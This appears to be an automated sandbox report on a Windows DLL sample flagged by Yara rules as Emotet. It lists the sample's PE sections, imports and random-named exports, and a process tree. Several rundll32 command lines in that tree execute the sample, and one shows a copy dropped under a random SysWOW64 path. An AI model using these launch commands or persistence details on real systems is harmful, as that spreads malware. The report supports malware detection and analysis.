                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x5a3000x18.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5a2300x40.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x154.rdata
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                    Sections

                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                    .text0x10000x28bb40x28c00False0.53924822661data6.1540438823IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .rdata0x2a0000x323620x32400False0.817800645211data7.40644078277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .data0x5d0000x1ba40x1200False0.287109375data2.60484752417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .pdata0x5f0000x4c40x600False0.360677083333AmigaOS bitmap font2.17228109861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                    .reloc0x600000x1bc00x1c00False0.7880859375data6.62631718459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                    Imports

                                                                                                                                                                                    DLLImport
                                                                                                                                                                                    KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                                                                                                                                                                                    USER32.dllGetDC, ReleaseDC, GetWindowRect

                                                                                                                                                                                    Exports

                                                                                                                                                                                    NameOrdinalAddress
                                                                                                                                                                                    Control_RunDLL10x100010a0
                                                                                                                                                                                    axamexdrqyrgb20x100017b0
                                                                                                                                                                                    bhramccfbdd30x10001690
                                                                                                                                                                                    bptyjtyr40x10001640
                                                                                                                                                                                    bxoqrnuua50x100016c0
                                                                                                                                                                                    cegjceivzmgdcffk60x100014e0
                                                                                                                                                                                    cgxpyqfkocm70x10001480
                                                                                                                                                                                    chjbtsnqmvl80x10001540
                                                                                                                                                                                    crfsijq90x10001730
                                                                                                                                                                                    empxfws100x10001590
                                                                                                                                                                                    fbgcvvbrlowsjsj110x10001550
                                                                                                                                                                                    fjhmprw120x10001660
                                                                                                                                                                                    gfqdajfucnxrv130x10001850
                                                                                                                                                                                    hcloldazhuvj140x10001790
                                                                                                                                                                                    idcumrbybo150x10001500
                                                                                                                                                                                    ihvpwdsfllpvrzy160x10001750
                                                                                                                                                                                    iuzqizpdhxqkmf170x100014c0
                                                                                                                                                                                    jaarlqsruhrwpipt180x100016e0
                                                                                                                                                                                    jndshbhgxdkvvtj190x10001600
                                                                                                                                                                                    jniijdleqsyajeis200x10001650
                                                                                                                                                                                    jtjqgma210x100016f0
                                                                                                                                                                                    kffxtbzhfgbqlu220x10001630
                                                                                                                                                                                    kwxkzdhqe230x100016d0
                                                                                                                                                                                    lidhnvsukgiuabh240x100016b0
                                                                                                                                                                                    ltcrkednwfkup250x10001820
                                                                                                                                                                                    lvrmqgtvhsegpbvmq260x10001770
                                                                                                                                                                                    mxvwvnerswyylp270x10001520
                                                                                                                                                                                    ndlmbjceavqdintmv280x100017d0
                                                                                                                                                                                    nvnriipkwrmxwsu290x10001510
                                                                                                                                                                                    oafxfavxmi300x10001570
                                                                                                                                                                                    ocwutlohg310x100014b0
                                                                                                                                                                                    olcklbdvo320x10001680
                                                                                                                                                                                    pawvqfmiz330x100015e0
                                                                                                                                                                                    pdmomnjmmryopqza340x10001560
                                                                                                                                                                                    plzkvjcbz350x10001710
                                                                                                                                                                                    poasqvltrkgvepng360x10001840
                                                                                                                                                                                    psjoyjhsrkg370x100015b0
                                                                                                                                                                                    qdimtzieldbl380x10001620
                                                                                                                                                                                    qzvngjfyuxpjag390x10001580
                                                                                                                                                                                    relsounb400x100016a0
                                                                                                                                                                                    rykebhcisi410x10001670
                                                                                                                                                                                    snrvgvzpjh420x100017c0
                                                                                                                                                                                    sqnfcfmocgbg430x10001740
                                                                                                                                                                                    sxgllzweihxqxi440x10001760
                                                                                                                                                                                    tgagxhhcfj450x10001780
                                                                                                                                                                                    thjyvtvttwpah460x10001830
                                                                                                                                                                                    uvypobslemtipv470x10001640
                                                                                                                                                                                    vgidwtjsbwpxkdxj480x100017a0
                                                                                                                                                                                    wahhdker490x100014a0
                                                                                                                                                                                    wamqmispvbxt500x100015f0
                                                                                                                                                                                    witvsjavqyw510x10001720
                                                                                                                                                                                    wopabadcwdizvwlgk520x10001490
                                                                                                                                                                                    wpzyecljz530x10001800
                                                                                                                                                                                    wukgfirfwilhu540x100015d0
                                                                                                                                                                                    xntbmrrxs550x100017f0
                                                                                                                                                                                    xsxwxreryufxwuhh560x10001700
                                                                                                                                                                                    xvgdevijtw570x10001610
                                                                                                                                                                                    ydvqidso580x100015c0
                                                                                                                                                                                    yggdjrsewuw590x100015a0
                                                                                                                                                                                    zaeqdmhaky600x100017e0
                                                                                                                                                                                    zakvwkjnk610x10001700
                                                                                                                                                                                    zqbggkzy620x100014f0
                                                                                                                                                                                    zqtdpertk630x100014d0
                                                                                                                                                                                    zshfybkvzv640x10001810
                                                                                                                                                                                    zxxopqyvfoesyhmup650x10001530

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    No network behavior found

                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                    Statistics

                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:24
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\mal2.dll"
                                                                                                                                                                                    Imagebase:0x8d0000
                                                                                                                                                                                    File size:893440 bytes
                                                                                                                                                                                    MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.582902080.00000000003D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.583952569.000000000073C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.582956002.000000000073C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.583809959.00000000003D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.609571158.00000000003D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.608882072.000000000073C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.648560636.000000000073C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.608527561.00000000003D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.610069085.000000000073C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:25
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1
                                                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:25
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\mal2.dll,Control_RunDLL
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000003.516939177.0000000002A69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:25
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.529764323.00000000033DA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.529712729.0000000002FD0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:27
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:30
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\mal2.dll,axamexdrqyrgb
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.584098715.000000000348A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.584033877.0000000003310000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:38
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\mal2.dll,bhramccfbdd
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.591122734.0000000002C60000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.591237102.0000000002CFA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:38
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:10:53
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:11:13
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:11:43
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                    Imagebase:0x7ff6de5a0000
                                                                                                                                                                                    File size:163336 bytes
                                                                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:03
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:28
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:30
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli",YjMy
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.689618667.0000000002E43000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.689328913.0000000002B90000.00000040.00000010.sdmp, Author: Joe Security

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:51
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:56
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:56
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7004 -ip 7004
                                                                                                                                                                                    Imagebase:0x810000
                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:12:59
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:02
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 308
                                                                                                                                                                                    Imagebase:0x810000
                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:10
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7004 -ip 7004
                                                                                                                                                                                    Imagebase:0x810000
                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:12
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 316
                                                                                                                                                                                    Imagebase:0x810000
                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:18
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                    Imagebase:0x7ff643210000
                                                                                                                                                                                    File size:455656 bytes
                                                                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:19
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff774ee0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:41
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:13:47
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLL
                                                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:14:20
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:18:14:22
                                                                                                                                                                                    Start date:01/12/2021
                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                    Imagebase:0x7ff641cd0000
                                                                                                                                                                                    File size:51288 bytes
